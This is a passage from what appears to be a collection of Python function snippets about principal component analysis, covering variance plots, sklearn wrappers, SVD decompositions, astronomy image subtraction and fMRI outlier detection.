date_recording_yyyymmdd)\n \n # 2-PC\n if plot_save_dir:\n PCAplotpath = Path(str(PCAplotpath).replace('_PCA_explained', \n '_PCA_2_components'))\n title = \"2-Component PCA: Control variation in\\n\\\n '{0}'\".format(grouping_variable) + \" (Top256 features)\"\n plotPCA(df, grouping_variable, var_subset=None, savepath=PCAplotpath, \n title=title, n_component_axes=2)\n plt.pause(2); plt.close()\n \n # 3-PC\n if plot_save_dir:\n PCAplotpath = Path(str(PCAplotpath).replace('_PCA_2_components', \n '_PCA_3_components'))\n title = \"3-Component PCA: Control variation in\\n\\\n '{0}'\".format(grouping_variable) + \" (Top256 features)\"\n plotPCA(df, grouping_variable, var_subset=None, savepath=PCAplotpath, \n title=title, n_component_axes=3, rotate=False)\n plt.pause(2)\n \n return df", "def runPCA(data, reducedDimensions, showScree):\n print(\"-->Running PCA.\")\n latent = gp.pca(data['features'], reducedDimensions, showScree, savePlots)\n plot(latent, data['colours'], reducedDimensions, \"Iris Dataset\", \"PCA\")", "def pca_helper(_args):\n # unpack args\n _trimmed_frame, _win, _sou_name, _sou_dir, _out_path, \\\n _library, _library_names_short, _fwhm, _plsc, _sigma, _nrefs, _klip = _args\n\n # run pca\n try:\n output = pca(_trimmed_frame=_trimmed_frame, _win=_win, _sou_name=_sou_name,\n _sou_dir=_sou_dir, _out_path=_out_path,\n _library=_library, _library_names_short=_library_names_short,\n _fwhm=_fwhm, _plsc=_plsc, _sigma=_sigma, _nrefs=_nrefs, _klip=_klip)\n return output\n except Exception as _e:\n print(_e)\n return None\n # finally:\n # return None", "def PCA_reduction(\n df: pd.DataFrame,\n cols: List[str],\n n_components: int,\n prefix: str = 'PCA_',\n random_seed: int = 42,\n keep: bool = False\n) -> pd.DataFrame:\n print(\"Executing PCA reduction on dataset...\")\n df = df.copy()\n pca = decomposition.PCA(n_components=n_components, random_state=random_seed)\n\n principal_components = pca.fit_transform(df[cols])\n\n principal_df = pd.DataFrame(principal_components)\n if not keep:\n df.drop(cols, axis=1, inplace=True)\n\n principal_df.rename(columns=lambda x: str(prefix) + str(x), inplace=True)\n\n # Align index of principal components and the original dataset.\n principal_df = principal_df.set_index(df.index)\n\n df = pd.concat([df, principal_df], axis=1)\n\n return df", "def run_pca(df, cols=None): \n import numpy as np\n import pandas as pd\n import matplotlib.pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n from sklearn.preprocessing import StandardScaler\n from sklearn.decomposition import PCA\n import mpld3\n\n # Define and markers to use for different categories\n groups_dict = {(u'D', 0):('Germany, unregulated', 'g', 'o'),\n (u'N', 0):('Norway, unregulated', 'b', 'o'),\n (u'D', 1):('Germany, regulated', 'g', '^'),\n (u'N', 1):('Norway, regulated', 'b', '^')}\n \n # Extract cols of interest\n cats = df[['country', 'regulated']]\n\n if cols:\n df = df[cols].astype(float)\n\n # Standardise the feature data\n feat_std = StandardScaler().fit_transform(df)\n\n # Setup PCA. 
Initially, choose to keep ALL components\n pca = PCA()\n\n # Fit model\n pca.fit(feat_std)\n\n # Get explained variances (in %)\n var_exp = 100*pca.explained_variance_ratio_\n cum_exp = np.cumsum(var_exp)\n\n # Get eigenvalues\n cov_mat = np.cov(feat_std.T)\n eig_vals, eig_vecs = np.linalg.eig(cov_mat)\n\n # Get number of EVs > 1 (Kaiser-Guttman criterion)\n # and print summary\n n_kgc = (eig_vals > 1).sum()\n print 'Variance explained by first %s PCs (%%):\\n' % n_kgc\n print var_exp[:n_kgc]\n print '\\nTotal: %.2f%%' % var_exp[:n_kgc].sum()\n \n # Plot\n fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 6))\n \n # Explained variance\n axes[0].bar(range(1, len(var_exp)+1), var_exp, \n align='center', label='Individual components')\n axes[0].plot(range(1, len(cum_exp)+1), cum_exp, \n 'r-o', label='Cumulative')\n axes[0].set_xlabel('Principal component')\n axes[0].set_ylabel('Variance explained (%)')\n axes[0].legend(loc='center right')\n \n # Eigenvalues\n axes[1].plot(range(1, len(eig_vals)+1), np.sort(eig_vals)[::-1], \n 'r-o', label='Eigenvalues')\n axes[1].axhline(1, c='k', ls='-', label='Kaiser-Guttman threshold')\n axes[1].set_xlabel('Principal component')\n axes[1].set_ylabel('Eigenvalue')\n axes[1].legend(loc='upper right') \n \n # PC loadings\n loads = pd.DataFrame(data=pca.components_, \n columns=df.columns,\n index=range(1, pca.components_.shape[0]+1)).T\n\n # Project into 2 and 3 components\n fig = plt.figure(figsize=(16, 6))\n \n # Plot 2 components\n ax = fig.add_subplot(1, 2, 1)\n \n # Refit the PCA, this time specifying 2 components\n # and transforming the result\n feat_reduced = PCA(n_components=2).fit_transform(feat_std)\n \n # Build df \n data = pd.DataFrame({'PC1':feat_reduced[:, 0],\n 'PC2':feat_reduced[:, 1],\n 'country':cats['country'],\n 'regulated':cats['regulated']}) \n\n groups = data.groupby(['country', 'regulated'])\n \n # Plot\n for name, group in groups:\n ax.scatter(group['PC1'], group['PC2'], s=60,\n label=groups_dict[name][0],\n c=groups_dict[name][1],\n marker=groups_dict[name][2])\n \n ax.set_xlabel('First principal component')\n ax.set_ylabel('Second principal component')\n ax.set_title('First two PCA directions')\n \n # Plot 3 components\n ax = fig.add_subplot(1, 2, 2, projection='3d', \n elev=-150, azim=135)\n\n # Refit the PCA, this time specifying 3 components\n # and transforming the result\n feat_reduced = PCA(n_components=3).fit_transform(feat_std)\n\n # Build df with colours\n data = pd.DataFrame({'PC1':feat_reduced[:, 0],\n 'PC2':feat_reduced[:, 1],\n 'PC3':feat_reduced[:, 2],\n 'country':cats['country'],\n 'regulated':cats['regulated']}) \n \n groups = data.groupby(['country', 'regulated'])\n \n # Plot\n for name, group in groups:\n ax.scatter(group['PC1'], group['PC2'], group['PC3'],\n label=groups_dict[name][0],\n c=groups_dict[name][1],\n marker=groups_dict[name][2],\n s=60)\n \n ax.set_title('First three PCA directions')\n ax.set_xlabel('First principal component')\n ax.set_ylabel('Second principal component')\n ax.set_zlabel('Third principal component')\n ax.legend(bbox_to_anchor=(0.15, -0.1), frameon=True)\n plt.show()\n\n return loads", "def my_pca(data_matrix, k):\n cov_matrix = np.cov(data_matrix.transpose())\n \n eigenvalues, eigenvectors = np.linalg.eig(cov_matrix)\n eigenvalues.sort()\n # sorts the eigenvalues in ascending order\n decending_eigenvalues = eigenvalues[-k:][::-1]\n # choose the highest k values and change the order to decending\n \n evalues, evectors = np.linalg.eig(cov_matrix)\n \n index_list = []\n for i in 
decending_eigenvalues:\n indexes = np.where(i == evalues)[0][0]\n index_list.append(indexes)\n \n \n evector_list = []\n for i in index_list:\n evector_list.append(evectors[i])\n \n evector_array = np.array(evector_list)\n \n reduced_matrix = np.dot(data_matrix, evector_array.transpose())\n \n return pd.DataFrame(reduced_matrix)", "def PCA_gen(pos, k = 6, self_loop = False):\n\n # Use PCA to find principle component projection\n p_components = PCA(n_components = 1).fit_transform(pos)\n\n a_idxs = neighbors(p_components, self_loop, k)\n ones = np.ones(size = a_idxs.shape[0])\n\n a = csr_matrix(ones, (a_idxs[:,0], a_idxs[:, 1]))\n\n return a", "def pca_detector(data):\n #- 'vol_shape' is the shape of volumes\n vol_shape = data.shape[:-1]\n #- 'n_vols' is the number of volumes\n n_vols = data.shape[-1]\n #- N is the number of voxels in a volume\n N = np.prod(vol_shape)\n\n #- Reshape to 2D array that is voxels by volumes (N x n_vols)\n # transpose to n_vols x N\n X = data.reshape((N, n_vols)).T\n\n \"\"\"\n The first part of the code will use PCA to get component matrix U\n and scalar projections matrix C\n \"\"\"\n\n #- Calculate unscaled covariance matrix for X\n unscaled_cov = X.dot(X.T)\n\n #- Use SVD to return U, S, VT matrices from unscaled covariance\n U, S, VT = npl.svd(unscaled_cov)\n\n #- Calculate the scalar projections for projecting X onto the vectors in U.\n #- Put the result into a new array C.\n C = U.T.dot(X)\n # set nans to 0\n C[np.isnan(C)] = 0\n #- Transpose C\n #- Reshape C to have the 4D shape of the original data volumes.\n C_vols = C.T.reshape((vol_shape + (n_vols,)))\n\n \"\"\"\n The second part of the code determines which voxels are inside the brain\n and which are outside the brain and creates a mask (boolean matrix)\n \"\"\"\n\n #get the mean voxel intensity of entire 4D object\n mean_voxel = np.mean(data)\n #get the mean volume (3D) across time series (axis 3)\n mean_volume = np.mean(data, axis=3)\n #boolean mask set to all voxels above .5 in the first volume\n #(.125 is the SPM criterion but .5 seems like a better threshold)\n mask = mean_volume > (.5 * mean_voxel) #threshold can be adjusted!\n out_mask = ~mask\n\n \"\"\"\n The third part of code finds the root mean square of U from step 1, then uses the\n mask from step 2 to determine which components explain data outside the brain\n Selects these \"bad components\" with high \"outsideness\"\n \"\"\"\n\n #Apply mask to C matrix to get all voxels outside of brain\n outside = C_vols[out_mask]\n #Get RMS of the voxels outside, reflecting \"outsideness\" of this scan\n RMS_out = np.sqrt(np.mean((outside ** 2), axis=0))\n\n #Apply mask to C matrix to get all voxels inside brain\n inside = C_vols[mask]\n #Get RMS of the voxels inside, reflecting \"insideness\" of this scan\n RMS_in = np.sqrt(np.mean((inside ** 2), axis=0))\n\n #The closer this ratio is to 1, the worse the volume\n RMS_ratio = RMS_out / RMS_in\n\n \"\"\"\n The fourth part of the code uses the \"bad components\" to generate a new\n \"bad data set\" and then puts this dataset through the outlier detector\n \"\"\"\n\n #Create a boolean mask for the 10% worst PCs (meaning highest RMS ratio)\n PC_bad = np.percentile(RMS_ratio, 90)\n PC_bad_mask = RMS_ratio > PC_bad\n\n U_bad = U[:, PC_bad_mask]\n C_bad = C[PC_bad_mask]\n\n #generates data set based on the bad PCs and (U and C matrices)\n X_bad = U_bad.dot(C_bad).T.reshape((vol_shape + (n_vols,)))\n\n # calculate outliers using iqr_detector\n _, outliers = mah_detector(X_bad)\n\n return X_bad, outliers", 
"def _mps_decompose_CA(self, A):\n Dl, d, Dr = A.shape\n Q, C = qr(np.reshape(A, [Dl, d * Dr]).T)\n nC = nfactor(C)\n # nC = max(abs(C.min()), abs(C.max()))\n if C.shape == (1, 1):\n Q *= np.sign(C.flat[0])\n C = np.ones((1, 1))\n else:\n C = (C.T) / nC\n Dl = C.shape[1]\n Q = np.reshape(Q.T, [Dl, d, Dr])\n return C, Q, nC, Dl", "def sparsepca(X, n_comp):\n n_samples, n_features = X.shape\n # center the data. Note we only do the global centering. i.e. earch column\n # is centered to zero mean. Though the data should already 'locally'\n # centered since each row is normalized to z score. \n X = X - X.mean(axis = 0)\n estimator = decomposition.SparsePCA(n_components=n_comp, alpha=0.8, max_iter = 100, n_jobs = 20, verbose = 1, tol = 1e-2)\n t0 = time()\n estimator.fit(X)\n train_time = (time() - t0)\n print \"done in %0.3fs\" % train_time\n components_ = estimator.components_\n X_projected = estormator.transform(X)\n \n return components_, X_projected", "def pca(adata: AnnData, *args, **kwargs):\n\n scatters(adata, \"pca\", *args, **kwargs)", "def pca(data,k=None,frac=0.99,whiten=1):\n n,d = data.shape\n mean = average(data,axis=0).reshape(1,d)\n data = data - mean.reshape(1,d)\n cov = dot(data.T,data)/n\n evals,evecs = linalg.eig(cov)\n if k is None: k = fraction(evals,frac)\n top = argsort(-evals)\n evals = evals[top[:k]]\n evecs = evecs.T[top[:k]]\n assert evecs.shape==(k,d)\n ys = dot(evecs,data.T)\n assert ys.shape==(k,n)\n if whiten: ys = dot(diag(sqrt(1.0/evals)),ys)\n return (ys.T,mean,evals,evecs)", "def inverse_pca(self, pca_img, components):\n reconstruct = np.dot(pca_img, components.T).astype(int)\n return reconstruct.reshape(-1, 28, 28)", "def testPCA(d = 10, N = 5000, k = 4, min_iter_nr = 20):\n\n print \"Input: dim, samples nr = %d, %d - Output: latent factors nr = %d\" % (d, N, k)\n mu = uniform(1, d)*3.+2.\n sigma = uniform((d,))*0.01\n A = normal(size=(k,d))\n\n # latent variables\n y = normal(0., 1., size=(N, k))\n # observations\n noise = normal(0., 1., size=(N, d)) * sigma\n x = dot(y, A) + mu + noise\n \n # Testing PCA \n for _b, _n in product((True, False), (min_iter_nr, )):\n t_start = time.time()\n PCA = pca(x.T, k = k)\n PCA.InferandLearn(max_iter_nr = _n, svd_on = _b)\n print \"PCA(svd_on=%s, max_iter_nr=%d) learned in %.5f seconds\" % (str(_b), _n, time.time() - t_start)\n print PCA.C\n print \"-\"*70", "def pca(tiles: np.ndarray, n_components: int = 5) -> np.ndarray:\n ntiles = len(tiles)\n npix = tiles[0].shape[0]\n tiles = (tiles).reshape(ntiles, npix ** 2)\n # ensure data is mean-centred\n for idx in range(ntiles):\n tiles[idx] -= np.mean(tiles[idx])\n # compute principle components\n pca = PCA(n_components=n_components, whiten=True).fit(tiles)\n # reconstruct independent signals based on orthogonal components\n components = pca.transform(tiles)\n cleaned_tiles = pca.inverse_transform(components)\n return cleaned_tiles.reshape(ntiles, npix, npix)", "def analyse_pca(cluster, three_dim=True):\n # create data array and name array:\n A = cluster.data_matrix\n names = cluster.row_header\n\n # assign colours to samples:\n colorconvert = {'F':'go', 'S':'co', 1:'ro', 2:'go', 3:'ko', 4:'bo', 5:'co', 6:'mo', 7:'yo', 8:'r<', 9:'g<', 10:'k<', 11:'b<', 12:'c<', 13:'m<', 14:'y<', 15:'rs', 16:'gs', 17:'ks', 18:'bs', 19:'cs', 20:'ms', 21:'ys' }\n colourlist = []\n for name in names:\n phase = re.search(\"(F|S)\", name)\n if phase is not None:\n #print phase.groups()[0]\n colourlist.append(colorconvert[phase.groups()[0]])\n else:\n colourlist.append('ko')\n #print names, 
\"\\n\", colourlist\n\n ############# PCA using numpy SVD decomposition ##################################\n print \"#\" * 30\n print \"SVA analysis\"\n U, s, Vt = numpy.linalg.svd(A, full_matrices=True)\n V = Vt.T\n\n # sort the PCs by descending order of the singular values (i.e. by the\n # proportion of total variance they explain)\n ind = numpy.argsort(s)[::-1]\n U = U[:, ind]\n s = s[ind]\n V = V[:, ind]\n S = numpy.diag(s)\n\n sumval = sum([ i ** 2 for i in s ])\n\n # if we use all of the PCs we can reconstruct the noisy signal perfectly\n\n # Mhat = numpy.dot(U, numpy.dot(S, V.T))\n # if we use only the first 2 PCs the reconstruction is less accurate\n # Mhat2 = numpy.dot(U[:, :2], numpy.dot(S[:2, :2], V[:,:2].T))\n\n # To remove the variance of the 1st PC, which is primarily associated with experimenter:\n matrix_reduced = numpy.dot(U[:,1:], numpy.dot(S[1:,1:], V[:,1:].T))\n #for checking decomposition is occurring properly:\n #print numpy.shape(U)\n #print numpy.shape(S)\n #print numpy.shape(Vt)\n #print numpy.shape(matrix_reduced)\n\n #print \"#\" * 30\n #print \"SVD eigenvectors/loadings:\"\n #print header[:var_num] , \"\\n\"\n #print U # need to work out appropriate way to calculate loadings!\n #print \"#\" * 30\n #print \"checking distance of loadings (eigen vectors)\"\n #for col in loadings[:,:]:\n # print col\n # print numpy.sqrt(sum([ a ** 2 for a in col ]))\n\n print \"PCA explained variance:\"\n print [ (z ** 2 / sumval) for z in s ]\n\n # * if M is considered to be an (observations, features) matrix, the PCs\n # themselves would correspond to the rows of S^(1/2)*V.T. if M is\n # (features, observations) then the PCs would be the columns of\n # U*S^(1/2).\n\n #q_scores = numpy.dot(numpy.sqrt(S), V.T)\n q_scores = numpy.dot(U, numpy.sqrt(S))\n\n pp = PdfPages(cluster.exportPath[0:-4] + '.PCA.pdf')\n if three_dim: # plot a three dimensional graph:\n fig = plt.figure(1)\n ax = fig.add_subplot(111, projection='3d')\n for idx in range(len(colourlist)):\n xs = q_scores[idx,0]\n ys = q_scores[idx,1]\n zs = q_scores[idx,2]\n name = re.search('[FS][LP][0-9]+',names[idx]).group(0)\n ax.scatter(xs, ys, zs, c=colourlist[idx][0], marker='o')\n ax.text(xs, ys, zs, name)\n\n ax.set_xlabel(\"PC1 (%.2f%%)\" % (100.0 * (s[0]**2)/sumval))\n ax.set_ylabel(\"PC2 (%.2f%%)\" % (100.0 * (s[1]**2)/sumval))\n ax.set_zlabel(\"PC3 (%.2f%%)\" % (100.0 * (s[2]**2)/sumval))\n\n plt.savefig(pp, format='pdf')\n plt.show()\n else: # plot two 2D graphs instead:\n for idx in range(len(colourlist)):\n fig = plt.figure(1)\n\n sub1 = fig.add_subplot(2,1,1)\n sub1.plot(q_scores[idx,0], q_scores[idx,1], colourlist[idx])\n plt.xlabel( \"PC1 (%.2f%%)\" % (100.0 * (s[0]**2)/sumval) )\n plt.ylabel( \"PC2 (%.2f%%)\" % (100.0 * (s[1]**2)/sumval) )\n sub1.annotate( names[idx], xy=(q_scores[idx,0], q_scores[idx,1]),xytext=(-15,10), xycoords='data', textcoords='offset points' )\n\n sub2 = fig.add_subplot(2,1,2)\n sub2.plot(q_scores[idx,0], q_scores[idx,2], colourlist[idx])\n plt.xlabel( \"PC1 (%.2f%%)\" % (100.0 * (s[0]**2)/sumval) )\n plt.ylabel( \"PC3 (%.2f%%)\" % (100.0 * (s[2]**2)/sumval) )\n sub2.annotate( names[idx], xy=(q_scores[idx,0],q_scores[idx,2]),xytext=(-15,10), xycoords='data', textcoords='offset points' )\n\n plt.savefig(pp, format='pdf')\n plt.show()\n\n plt.close()\n return matrix_reduced", "def process_features(features, neutral_factor):\n\n N = create_neutral_vector(np.array([[features.shape[1], 1]]), features.shape[0])\n\n pc_projections, pcs = pca.neutral_sub_pca_vector(features, 
neutral_factor*N)\n\n return pc_projections, pcs", "def pca(embedding, num_components=3, principal_components=None):\n# shape = embedding.get_shape().as_list()\n shape = tf.shape(embedding)\n embedding = tf.reshape(embedding, [-1, shape[3]])\n\n if principal_components is None:\n principal_components = calculate_principal_components(embedding,\n num_components)\n embedding = tf.matmul(embedding, principal_components)\n\n embedding = tf.reshape(embedding,\n [shape[0], shape[1], shape[2], num_components])\n return embedding", "def PCA_subtraction(im, ref_lib, num_PCA_modes):\n print('Performing PCA background subtraction using {} modes'.format(num_PCA_modes))\n #concatenate input image into 1-D array\n im_x = im.shape[1]\n im_y = im.shape[0]\n \n im = im.ravel()\n\n num_PCA_modes = np.array(num_PCA_modes)\n \n # reads list of reference frames into data matrix by first concatenating the 2-D .fits images\n # into 1-D arrays and then row stacking these images into a 2-D np.array\n try:\n ref_frames = np.stack([fits.getdata(ref_lib[i]).ravel() for i in range(len(ref_lib))], axis=0)\n except:\n ref_frames = np.stack([ref_lib[i].ravel() for i in range(len(ref_lib))], axis=0)\n\n # subtracts the mean of each reference frame from each reference frame \n ref_frames_mean_sub = ref_frames - np.nanmean(ref_frames, axis=1)[:, None]\n ref_frames_mean_sub[np.where(np.isnan(ref_frames_mean_sub))] = 0\n \n # import pdb; pdb.set_trace()\n # creates covariance matrix from mean subtracted reference frames \n covar_psfs = np.cov(ref_frames_mean_sub)\n tot_basis = covar_psfs.shape[0]\n \n num_PCA_modes = np.clip(num_PCA_modes - 1, 0, tot_basis-1) # clip values, for output consistency we'll keep duplicates\n max_basis = np.max(num_PCA_modes) + 1 # maximum number of eigenvectors/KL basis we actually need to use/calculate\n \n # calculates eigenvalues and eigenvectors of the covariance matrix, but only the ones we need (up to max basis)\n evals, evecs = la.eigh(covar_psfs, eigvals=(tot_basis-max_basis, tot_basis-1))\n \n evals = np.copy(evals[::-1])\n evecs = np.copy(evecs[:,::-1], order='F') \n \n # calculates the PCA basis vectors\n basis_vecs = np.dot(ref_frames_mean_sub.T, evecs)\n basis_vecs = basis_vecs * (1. 
/ np.sqrt(evals * (np.size(im) - 1)))[None, :] #multiply a value for each row\n \n #subtract off the mean of the input frame\n im_mean_sub = im - np.nanmean(im)\n \n # duplicate science image by the max_basis to do simultaneous calculation for different number of PCA modes\n im_mean_sub_rows = np.tile(im_mean_sub, (max_basis, 1))\n im_rows_selected = np.tile(im_mean_sub, (np.size(num_PCA_modes), 1)) # this is the output image which has less rows\n \n # bad pixel mask\n # do it first for the image we're just doing computations on but don't care about the output\n im_nanpix = np.where(np.isnan(im_mean_sub_rows))\n im_mean_sub_rows[im_nanpix] = 0\n # now do it for the output image\n im_nanpix = np.where(np.isnan(im_rows_selected))\n im_rows_selected[im_nanpix] = 0\n \n inner_products = np.dot(im_mean_sub_rows, np.require(basis_vecs, requirements=['F']))\n # select the KLIP modes we want for each level of KLIP by multiplying by lower diagonal matrix\n lower_tri = np.tril(np.ones([max_basis, max_basis]))\n inner_products = inner_products * lower_tri\n \n # make a model background for each number of basis vectors we actually output\n model = np.dot(inner_products[num_PCA_modes,:], basis_vecs.T)\n \n # subtract model from input frame for each number of PCA modes chosen\n PCA_sub_images = (im_rows_selected - model).reshape(np.size(num_PCA_modes), im_y, im_x)\n\n #Adding back in the mean to the model so that the model can be subtracted from the original image later. \n if type(num_PCA_modes) is np.int64:\n return PCA_sub_images[0], model.reshape(im_y, im_x)+np.nanmean(im)\n elif type(num_PCA_modes) is np.ndarray:\n return PCA_sub_images, model.reshape(np.size(num_PCA_modes), im_y, im_x)+np.nanmean(im)\n \n else:\n print('Unsupported datatype for variable: num_PCA_modes. 
Variable must be either int or 1-D np.ndarray')", "def plot_PCA():\n X, languages = prepare_data_matrix()\n #print(X)\n eigenvectors, eigenvalues=power_iteration_two_components(X)\n explain = explained_variance_ratio(X, eigenvectors, eigenvalues)\n X=project_to_eigenvectors(X,eigenvectors)\n\n #print(X)\n plt.title('Explained variance: %.3f' % explain)\n plt.scatter(X[:,0], X[:,1])\n for i in range(len(X)):\n plt.text(X[i,0], X[i,1], languages[i][:3])\n plt.show()", "def eigen_decomposition(X, features):\n # Center to average\n Xctr = X - X.mean(0)\n # covariance matrix\n Xcov = np.cov(Xctr.T)\n\n # Compute eigenvalues and eigenvectors\n eigen_values, eigen_vectors = sp.linalg.eigh(Xcov)\n\n # Sort the eigenvalues and the eigenvectors descending\n sortedindex = np.argsort(eigen_values)[::-1]\n eigen_values = eigen_values[sortedindex]\n eigen_vectors = eigen_vectors[:, sortedindex]\n\n ###########\n y_pos = np.arange(len(features))\n weight = eigen_vectors[0]\n\n figure, axis = plt.subplots(2, 1)\n\n axis[0].bar(features, eigen_vectors[0])\n plt.setp(axis[0], title=\"First and Second Component's Eigenvectors \", ylabel='Weight')\n axis[0].set_xticks(features, features)\n axis[1].bar(features, eigen_vectors[1])\n axis[1].set_xticks(features, features)\n plt.setp(axis[1], ylabel='Weight')\n # axis[0].bar(y_pos, weight, align='center', alpha=0.5)\n # axis[0].xticks(y_pos, features)\n # axis[0].ylabel('Weight')\n # axis[0].title('Features')\n #\n # axis[1].bar(y_pos, weight, align='center', alpha=0.5)\n # axis[1].xticks(y_pos, features)\n # axis[1].ylabel('Weight')\n # axis[1].title('Features')\n\n plt.show()\n # return eigen_values, eigen_vectors", "def demodulate(Z, over_space=True, depth=1):\n\n #do complex PCA on each IMF\n N,T = Z.shape\n\n if over_space:\n\n #construct a matrix with the real and imaginary parts separated\n X = np.zeros([2*N, T], dtype='float')\n X[:N, :] = Z.real\n X[N:, :] = Z.imag\n\n pca = PCA()\n pca.fit(X.T)\n\n complex_pcs = np.zeros([N, N], dtype='complex')\n for j in range(N):\n pc = pca.components_[j, :]\n complex_pcs[j, :].real = pc[:N]\n complex_pcs[j, :].imag = pc[N:]\n\n phase = np.angle(Z)\n for k in range(depth):\n #compute the kth PC projected component\n proj = np.dot(Z.T.squeeze(), complex_pcs[k, :].squeeze())\n phase -= np.angle(proj)\n\n else:\n\n first_pc = np.zeros([T], dtype='complex')\n\n pca_real = PCA(n_components=1, svd_solver=\"randomized\")\n pca_real.fit(Z.real)\n print('pca_real.components_.shape=',pca_real.components_.shape)\n first_pc.real = pca_real.components_.squeeze()\n \n pca_imag = PCA(n_components=1, svd_solver=\"randomized\")\n pca_imag.fit(Z.imag)\n print('pca_imag.components_.shape=',pca_imag.components_.shape)\n first_pc.imag = pca_imag.components_.squeeze()\n\n complex_pcs = np.array([first_pc])\n\n proj = first_pc\n\n #demodulate the signal\n phase = np.angle(Z) - np.angle(proj)\n\n return phase,complex_pcs", "def feature_cPCA24(wv, n_components=12, incremental=False, batch_size=None):\n if incremental:\n raise NotImplementedError(\"Can't run incremental PCA yet.\")\n\n ers = np.reshape(np.transpose(wv[:24, :, :], axes=(1, 0, 2)), (24 * N_CHANNELS, -1))\n pca = PCA(n_components)\n scores = pca.fit_transform(ers.T)\n return scores", "def pca(cube, angle_list, cube_ref=None, scale_list=None, ncomp=1, ncomp2=1,\n svd_mode='lapack', scaling=None, adimsdi='double', mask_center_px=None,\n source_xy=None, delta_rot=1, fwhm=4, imlib='opencv',\n interpolation='lanczos4', collapse='median', check_mem=True,\n full_output=False, 
verbose=True, debug=False):\n if not cube.ndim > 2:\n raise TypeError('Input array is not a 3d or 4d array')\n\n if check_mem:\n input_bytes = cube.nbytes\n if cube_ref is not None:\n input_bytes += cube_ref.nbytes\n if not check_enough_memory(input_bytes, 1.5, False):\n msgerr = 'Input cubes are larger than available system memory. '\n msgerr += 'Set check_mem=False to override this memory check or '\n msgerr += 'use the incremental PCA (for ADI)'\n raise RuntimeError(msgerr)\n\n start_time = time_ini(verbose)\n\n angle_list = check_pa_vector(angle_list)\n #***************************************************************************\n # ADI + mSDI. Shape of cube: (n_channels, n_adi_frames, y, x)\n #***************************************************************************\n if cube.ndim == 4:\n if adimsdi == 'double':\n res_pca = _adimsdi_doublepca(cube, angle_list, scale_list, ncomp,\n ncomp2, scaling, mask_center_px, debug,\n svd_mode, imlib, interpolation,\n collapse, verbose, start_time,\n full_output)\n residuals_cube_channels, residuals_cube_channels_, frame = res_pca\n elif adimsdi == 'single':\n res_pca = _adimsdi_singlepca(cube, angle_list, scale_list, ncomp,\n scaling, mask_center_px, debug,\n svd_mode, imlib, interpolation,\n collapse, verbose, start_time,\n full_output)\n cube_allfr_residuals, cube_adi_residuals, frame = res_pca\n else:\n raise ValueError('`Adimsdi` mode not recognized')\n # **************************************************************************\n # ADI+RDI\n # **************************************************************************\n elif cube.ndim == 3 and cube_ref is not None:\n res_pca = _adi_rdi_pca(cube, cube_ref, angle_list, ncomp, scaling,\n mask_center_px, debug, svd_mode, imlib,\n interpolation, collapse, verbose, full_output,\n start_time)\n pcs, recon, residuals_cube, residuals_cube_, frame = res_pca\n # **************************************************************************\n # ADI. 
Shape of cube: (n_adi_frames, y, x)\n # **************************************************************************\n elif cube.ndim == 3 and cube_ref is None:\n res_pca = _adi_pca(cube, angle_list, ncomp, source_xy, delta_rot, fwhm,\n scaling, mask_center_px, debug, svd_mode, imlib,\n interpolation, collapse, verbose, start_time, True)\n\n if source_xy is not None:\n recon_cube, residuals_cube, residuals_cube_, frame = res_pca\n else:\n pcs, recon, residuals_cube, residuals_cube_, frame = res_pca\n\n else:\n msg = 'Only ADI, ADI+RDI and ADI+mSDI observing techniques are '\n msg += 'supported'\n raise RuntimeError(msg)\n\n if cube.ndim == 3:\n if full_output:\n if source_xy is not None:\n return recon_cube, residuals_cube, residuals_cube_, frame\n else:\n return pcs, recon, residuals_cube, residuals_cube_, frame\n else:\n return frame\n elif cube.ndim == 4:\n if full_output:\n if adimsdi == 'double':\n return residuals_cube_channels, residuals_cube_channels_, frame\n elif adimsdi == 'single':\n return cube_allfr_residuals, cube_adi_residuals, frame\n else:\n return frame", "def reduce_dimension(positives, negatives, to_return=True, fv_len=10,\n new_pca=True):\n\n features = dict() \n \n # namapovani na numpy matice pro PCA\n X = np.vstack((np.vstack(positives), np.vstack(negatives)))\n Y = np.vstack((np.vstack([1]*len(positives)), np.vstack([-1]*len(negatives)))) \n \n print \"Data shape: \", X.shape, Y.shape, len(positives[0])\n \n # ulozeni puvodnich dat do souboru\n #dr.save_obj(parentname + \"/\" + childname + \"/raw_data.pklz\")\n \n # PCA\n if new_pca or pca is None:\n pca = PCA(n_components=fv_len) # vytvori PCA\n #pca = DEC(n_components=fv_len) # vytvori PCA\n pca.fit(X, Y)\n \n reduced = pca.transform(X) # redukuje dimenzi vektoru priznaku\n \n # znovu namapuje na zavedenou strukturu\n features = list(reduced)\n \n # ulozeni PCA\n #dataset.save_obj(pca, self.PCA_path+\"/PCA_\"+self.descriptor_type+\".pkl\")\n\n if to_return: return pca, features", "def getpara(pca, normalized):\n scores = pca.transform(normalized)\n loadings = pca.components_\n\n scores = pd.DataFrame(scores, index=normalized.index, columns=[str(i) for i in range(pca.n_components_)])\n loadings = pd.DataFrame(loadings, index=[str(i) for i in range(pca.n_components_)], columns=normalized.columns)\n return scores, loadings", "def _get_principal_df(self, n_components: int) -> pd.DataFrame:\n pca = PCA(n_components=n_components)\n principalComponents = pca.fit_transform(self.df)\n return pd.DataFrame(data=principalComponents\n , columns=[f'principal component {i}' for i in range(1, n_components + 1)])", "def new_decomposition(self, verbose=False):\n V = self.degeneracy_matrix().kernel()\n p = next_prime_of_characteristic_coprime_to(F.ideal(1), self.level())\n T = self.hecke_matrix(p)\n D = T.decomposition_of_subspace(V)\n while len([X for X in D if not X[1]]) > 0:\n p = next_prime_of_characteristic_coprime_to(p, self.level())\n if verbose: print p.norm()\n T = self.hecke_matrix(p)\n D2 = []\n for X in D:\n if X[1]:\n D2.append(X)\n else:\n if verbose: print T.restrict(X[0]).fcp()\n for Z in T.decomposition_of_subspace(X[0]):\n D2.append(Z)\n D = D2\n D = [self.subspace(X[0]) for X in D]\n D.sort()\n S = Sequence(D, immutable=True, cr=True, universe=int, check=False)\n return S", "def run_pca(dat):\n dt = 10 # binning at 10 ms\n NT = dat.shape[-1]\n\n NN = len(dat)\n\n # top PC directions from stimulus + response period\n\n droll = np.reshape(dat, (NN, -1)) # first 80 bins = 1.6 sec\n droll = droll - np.mean(droll, 
